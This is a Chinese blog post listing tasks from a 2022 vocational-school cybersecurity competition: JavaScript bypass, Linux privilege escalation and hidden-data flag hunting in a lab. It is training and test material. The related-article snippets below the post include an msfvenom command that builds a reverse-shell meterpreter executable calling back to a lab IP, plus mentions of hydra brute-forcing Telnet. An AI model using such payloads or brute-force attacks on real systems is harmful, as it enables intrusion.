2022年中职组网络安全新赛题

最新推荐文章于 2023-12-02 00:00:00 发布
最新推荐文章于 2023-12-02 00:00:00 发布
阅读量1.8k 收藏 4
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 中职网络空间安全赛题 文章标签: 大数据 web安全 网络 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48609816/article/details/125453697
该博客详细介绍了2022年中职组网络安全比赛的多个赛题,包括JavaScript安全绕过、Linux系统渗透提权和隐藏信息探索。参赛者需利用渗透测试工具,如Kali Linux,进行服务器信息收集、漏洞利用及权限提升,同时从FTP服务的图片和文件中提取隐藏的flag。每个赛题都涉及特定的操作和技巧,旨在检验选手的网络安全技能和信息隐藏发现能力。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

2022年中职组网络安全赛题

B-8:JavaScript安全绕过

  1. 使用渗透机场景kali中工具扫描服务器,将服务器上apache版本号作为flag提交;
  2. 使用渗透机场景windows7访问服务器场景中的网站(网站路径为IP/javascript),找到网站首页中flag并提交;
  3. 使用渗透机场景windows7根据第二题的入口继续访问服务器本题场景,通过提示得到flag并提交;
  4. 使用渗透机场景windows7根据第三题入口继续访问服务器的本题场景,通过提示得到flag并提交;
  5. 使用渗透机场景windows7根据第四题入口继续访问服务器的本题场景,通过提示得到flag并提交;
  6. 使用渗透机场景windows7根据第五题入口继续访问服务器的本题场景,通过提示得到flag并提交;

B-9:Linux系统渗透提权

  1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;
  2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;
  3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;
  4. 使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;
  5. 使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;
  6. 使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。

B-10:隐藏信息探索

  1. 访问服务器的FTP服务,下载图片QR,从图片中获取flag,并将flag提交;
  2. 访问服务器的FTP服务,下载文件document,从文件中获取flag,并将flag提交;
  3. 访问服务器的FTP服务,下载图片beach,从图片中获取flag,并将flag提交;
  4. 访问服务器的FTP服务,下载图片grass,从图片中获取flag,并将flag提交;
  5. 访问服务器的FTP服务,下载图片tree,从图片中获取flag,并将flag提交;
  6. 访问服务器的FTP服务,下载压缩文件style,从压缩文件中获取flag,并将flag提交。
2021 河南省中等职业教育技能大网络安全”项目比任务书解析教程
旺仔Sec&blog
12-01 1546
2021 河南省中等职业教育技能大网络安全”项目比任务书解析教程
2022浙江省中职网络空间安全项模块B--Windows渗透测试
Aluxian_的博客
12-01 2795
2.通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为teltest),将hydra使用的必要参数当做FLAG进行提交(例:nmap -s -p 22);3.通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为teltest),将破解成功的密码当做FLAG进行提交;服务器场景:Server2003(开放链接)
网络空间安全中职重庆市比解析分析四个阶段解析答案(共五套)第三套
PushSafe
05-03 1241
2021中职网络安全项 重庆市竞任务书C 一、竞时间 总计:480分钟 二、竞阶段 竞阶段 任务阶段 竞任务 竞时间 分值 A、B模块 A-1 Windows操作系统安全配置 180分钟 200分 A-2 Linux操作系统安全配置 B-1 数据库安全加固 400分 B-2 数据分析-B B-3 Windows操作系统渗透测试 B-4 暴力破解 阶段切换 阶段切换(午休) 120分钟 0 C、D模块 C模块 CTF夺旗-攻击 180分钟 200分 D模块 CTF夺旗.
2023河南省第二届职业技能大郑州市选拔网络安全”项目比任务书
旺仔Sec&blog
02-19 2893
2023河南省第二届职业技能大郑州市选拔网络安全” 项目比任务书
河南第二届职业技能大网络安全(世)项目竞
旺仔Sec&blog
02-12 1826
河南第二届职业技能大 网络安全(世)项目竞
2022河南省第一届职业技能大网络安全项 B模块任务书
Aluxian_的博客
03-02 1148
任务环境说明: 服务器场景:Server2130 服务器场景操作系统:Linux(关闭链接) Flag值格式:Flag{Xxxx123},括号中的内容作为 Flag值,提交 Xxxx123 即可 1.通过本地PC中渗透测试平台Kali对靶场景进行系统服务及版本扫描渗透测试,将该操作显示结果中Apache服务对应的版本信息字符串作为Flag提交; 2.通过本地PC中渗透测试平台Kali对靶场景进行渗透测试,将该场景/var/www/html目录中waf防火墙文件中的所有的被过滤的字符串内容作为Fl
2022中职网络安全”国
12-19
协作实践能力,引导中等职业学校关注网络安全技术发展趋势和 产业应用方向,促进专业建设与教学改革;推进中职学校与相关 企业的合作,更好地实现工学结合的人才培养模式,为网络信息 安全行业培养高素质的技能型...
全国职业院校技能大中职网络安全(2018-2022
最新发布
01-31
全国职业院校技能大中职网络安全,例如: (1)2018全国职业院校技能大中职网络空间安全卷1-10 (2)2019全国职业院校技能大中职网络空间安全卷1-10 (3)2020全国职业...
2022中职网络安全项广西自治区任务书-3
04-21
2022中职网络安全项广西自治区任务书-3,SSH弱口令渗透测试,Linux操作系统渗透测试,远程代码执行渗透测试,中间件渗透测试
2022湖南省中职网络安全技能竞
04-06
加解析和环境
2022山东省职业院校技能大中职网络搭建与应用”
12-23
2022山东省职业院校技能大中职网络搭建与应用”2022山东省“网络搭建与应用”库 通过竞,检验参选手的计算网络的拓扑规划能力、IP地址规划能力、综合布线的施工测试能力、设备配置与...
2021全国职业技能大-网络安全解析总结②(超详细)
热门推荐
Aluxian_的博客
10-28 1万+
2021全国职业技能大-网络安全解析总结(2)模块A 基础设施设置与安全加固有问可以私信博主哦~ 模块A 基础设施设置与安全加固 一、项目和任务描述: 假定你是某企业的网络安全工程师,对于企业的服务器系统,根据任务要求确保各服务正常运行,通过综合运用登录和密码策略、数据库安全策略、流量完整性保护策略、事件监控策略、防火墙策略等多种安全策略来服务器系统的网络安全防御能力。本模块要求对具体任务的操作截图加以相应的文字说明,以word文档的形式书写,以PDF格式保存,以位号作为文件名。 二、服务
2023山东省职业院校技能竞网络安全”项目竞
旺仔Sec&blog
11-14 1036
网络安全”竞共分A.基础设施设置与安全加固;B.网络安全事件响应、数字取证调查和应用安全;C.CTF夺旗-攻击;D.CTF夺旗-防御等四个模块竞时间安排和分值重见表1。
2023中职网络安全-渗透win20230217(解析)
m0_46056107的博客
06-17 442
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=10.100.100.119 LPORT=4444 -b"\x00" -f exe > aiyou.exe将驱动开启就可以传文件到靶运行。5·访问服务器,找到主管理员桌面下文本文档信息,将文本文档中信息作为Flag提交;6·访问服务器,找到主中回收站唯一信息,将信息中的内容作为Flag提交。3·访问服务器,找到主管理员密码,将管理员密码作为Flag提交
河南省第一届职业技能大网络安全项目试
m0_46056107的博客
11-25 492
(4)在上一的基础上使用命令调用该模块,查看需要配置的信息(使用show options命令),将回显中需要配置的目标地址,密码使用的猜解字典,线程,账户配置参数的字段作为FLAG提交(之间以英文逗号分隔,例hello,test,..,..);密码:root),进入mysql数据库,改变默认 mysql 管理员的名称,将系统的默认管理员root 改为 admin,防止被列举,将操作命令作为flag提交。密码:root),查看数据库版本号,将查看数据库版本号的命令作为flag提交
2023中职网络安全“—Linux系统渗透
weixin_57060854的博客
11-16 879
2023中职网络安全“—Linux系统渗透③。
2024 甘肃省职业院校技能大中职 电子与信息类“网络安全项竞-C卷
Aluxian_的博客
12-02 407
每个参队拥有专属的堡垒服务器,其他队不能访问。4.在渗透中对服务器进行渗透,将用于渗透服务器网站的页面的绝对路径作为 Flag提交(路径中 IP 地址用“IP”代替,例如 http://IP/index.php);3.通过本地 PC 中渗透测试平台 Kali 对服务器场景进行渗透测试,将该场景中的当前最高账户管理员的密码作为 Flag提交;6.在渗透中对服务器进行渗透,在服务器中获取主文件信息,将root 目录flag 文件的内容作为 Flag提交
网路安全技能竞——【Linux操作系统渗透】解析(超级详细)
旺仔Sec&blog
05-30 1810
网路安全技能竞——【Linux操作系统渗透】解析(超级详细),需要练习靶可以私信博主哈
中职网络安全—隐藏信息探索
JJH2724719395的博客
12-03 1531
隐写
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Beluga

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值